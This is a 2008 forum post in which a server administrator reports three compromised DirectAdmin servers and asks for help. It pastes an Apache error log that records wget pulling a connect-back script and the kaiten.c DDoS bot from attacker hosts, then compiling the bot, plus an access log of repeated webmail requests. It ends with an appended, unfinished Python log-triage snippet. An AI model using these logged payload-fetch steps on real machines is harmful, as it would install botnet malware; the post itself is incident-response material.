3 DA Servers Compromised Today (kaiten.c)

Status
Not open for further replies.

Alwaysonline (Verified User; joined Mar 24, 2005; messages: 15; location: Annapolis MD)

Hey Guys,

I am wondering if anyone has had the same issues and if we can find a commonality / vulnerability somewhere.

I have a bunch of dedicated DA servers under management; 3 of them were hit today / compromised. DOS scripts / programs were uploaded.

Each of the servers runs different software:

Server 1 (dedicated Miva Merchant server) w/DA (apf, clam). Clam actually alerted me to the compromise early this morning (it found the trojan in the /var/tmp directory).

Server 2 (dedicated x-cart server)

Server 3 (dedicated joomla server)

Each of these boxes is very clean - they are all not the latest kernel and stuff but something has to be common to all of them.

I searched through the apache log on Server 1, and found what looks like webmail being attacked (I will post those logs below as well - the remote IP attacking is a Verizon IP; I know my client wasn't checking his mail from midnight to 7am this morning).

Each of the servers is pretty up to date. I found evidence of the trojans being downloaded in the /var/log/httpd/error_log file (evidence is posted below).

APACHE ERROR LOG: /var/log/httpd/error_log
-----------------------------------------------------------------
[Tue Dec 30 00:10:02 2008] [notice] SIGHUP received. Attempting to restart
[Tue Dec 30 00:10:02 2008] [notice] Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7a PHP/4.4.8 mod_perl/1.29 FrontPage/5.0.2.2510 configured -- resuming normal operations
[Tue Dec 30 00:10:02 2008] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Tue Dec 30 00:10:02 2008] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Tue Dec 30 00:11:01 2008] [notice] caught SIGTERM, shutting down
[Tue Dec 30 00:11:02 2008] [notice] Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7a PHP/4.4.8 mod_perl/1.29 FrontPage/5.0.2.2510 configured -- resuming normal operations
[Tue Dec 30 00:11:02 2008] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Tue Dec 30 00:11:02 2008] [notice] Accept mutex: sysvsem (Default: sysvsem)
--07:28:29-- http://64.62.225.99/~jhtech/cback.txt
=> `/var/tmp/cb.txt'
Connecting to 64.62.225.99:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [text/plain]

0K 100% 44.90 MB/s

07:28:29 (44.90 MB/s) - `/var/tmp/cb.txt' saved [565/565]

--09:09:00-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... --09:09:00-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... 200 OK
Length: 39,952 (39K) [text/x-c]

0K ..connected.
HTTP request sent, awaiting response... ....200 OK
Length: 39,952 (39K) [text/x-c]
kaiten.c has sprung into existence.
Retrying.

.... .......... .......... ......... 100% 154.59 KB/s

09:09:00 (154.59 KB/s) - `kaiten.c' saved [39952/39952]

kaiten.c:170: warning: conflicting types for built-in function 'pow'
kaiten.c: In function `killd':
kaiten.c:669: warning: the address of `disable', will always evaluate as `true'
--09:09:01-- http://c3server.net/.access/kaiten.c
(try: 2) => `kaiten.c.1'
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,952 (39K) [text/x-c]

0K .......... .......... .......... ......... 100% 233.09 KB/s

09:09:02 (233.09 KB/s) - `kaiten.c.1' saved [39952/39952]

gcc: kaiten.c: No such file or directory
gcc: no input files
--09:18:06-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... --09:18:06-- http://c3server.net/.access/kaiten.c
=> `kaiten.c'
Resolving c3server.net... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... 64.27.50.15
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,952 (39K) [text/x-c]

0K ..200 OK
Length: 39,952 (39K) [text/x-c]
kaiten.c has sprung into existence.
Retrying.

........ .......... .......... ......... 100% 169.41 KB/s

09:18:06 (169.41 KB/s) - `kaiten.c' saved [39952/39952]

kaiten.c:170: warning: conflicting types for built-in function 'pow'
kaiten.c: In function `killd':
kaiten.c:669: warning: the address of `disable', will always evaluate as `true'
--09:18:07-- http://c3server.net/.access/kaiten.c
(try: 2) => `kaiten.c.2'
Connecting to c3server.net|64.27.50.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,952 (39K) [text/x-c]

0K .......... .......... .......... ......... 100% 136.80 KB/s

09:18:08 (136.80 KB/s) - `kaiten.c.2' saved [39952/39952]

gcc: kaiten.c: No such file or directory
gcc: no input files
--------------------------------------------------------------------



APACHE LOG (log for the site - looks like it is being attacked from midnight through this morning - I will only post part of the log, but it looks like this throughout the early morning, midnight to 8am)

-----------------------------------------------------------------
71.246.82.38 - - [30/Dec/2008:04:01:12 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:01:12 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:03 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:03 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:53 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:02:53 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:03:44 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:03:44 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:04:34 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:04:34 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:05:25 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:05:25 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:06:15 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:06:15 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:06 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:06 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:56 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:07:56 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:08:47 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:08:47 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:09:37 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:09:37 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:10:28 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:10:28 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:11:18 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:11:18 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:09 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:09 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:59 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:12:59 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:13:50 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:13:50 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:14:40 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:14:41 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:15:31 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:15:31 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:16:21 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:16:22 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:17:12 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:17:12 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:02 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:03 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:53 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:18:53 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:19:43 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:19:44 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:20:34 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:20:34 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:21:24 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:21:25 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:22:15 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:22:15 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:05 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:06 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:56 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:23:56 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:24:46 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:24:47 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:25:37 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:25:37 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:26:27 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:26:28 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:27:18 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:27:18 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:08 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:09 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:59 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:28:59 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:29:49 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:29:50 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:30:40 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:30:40 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:31:31 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:31:31 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:32:21 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:32:21 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:33:12 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:33:12 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:02 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:02 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:53 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:34:53 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:35:43 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:35:43 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:36:34 -0500] "GET /webmail/process.php?refr=true&folder=inbox&pag=1&tid=clean&lid=en_US HTTP/1.1" 3
02 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.246.82.38 - - [30/Dec/2008:04:36:34 -0500] "GET /webmail/messages.php?tid=clean&lid=en_US&folder=inbox&pag=1 HTTP/1.1" 200 12947
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
--------------------------------------------------------------------------

Any help much appreciated.
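
An added example, not part of the original post: one way to triage an access-log excerpt like the one above is to measure each client's request cadence on a single path, which separates steady fixed-interval polling from bursts of requests. The sample lines are constructed (documentation-range client IPs, timing modelled on the excerpt), the function names are hypothetical, and the thresholds in `classify` are assumptions to tune; the parser expects one combined-format entry per line.

```python
import re
from datetime import datetime
from statistics import mean, pstdev

# Combined log format: client, identd, user, [time], "METHOD URI PROTO", status, size
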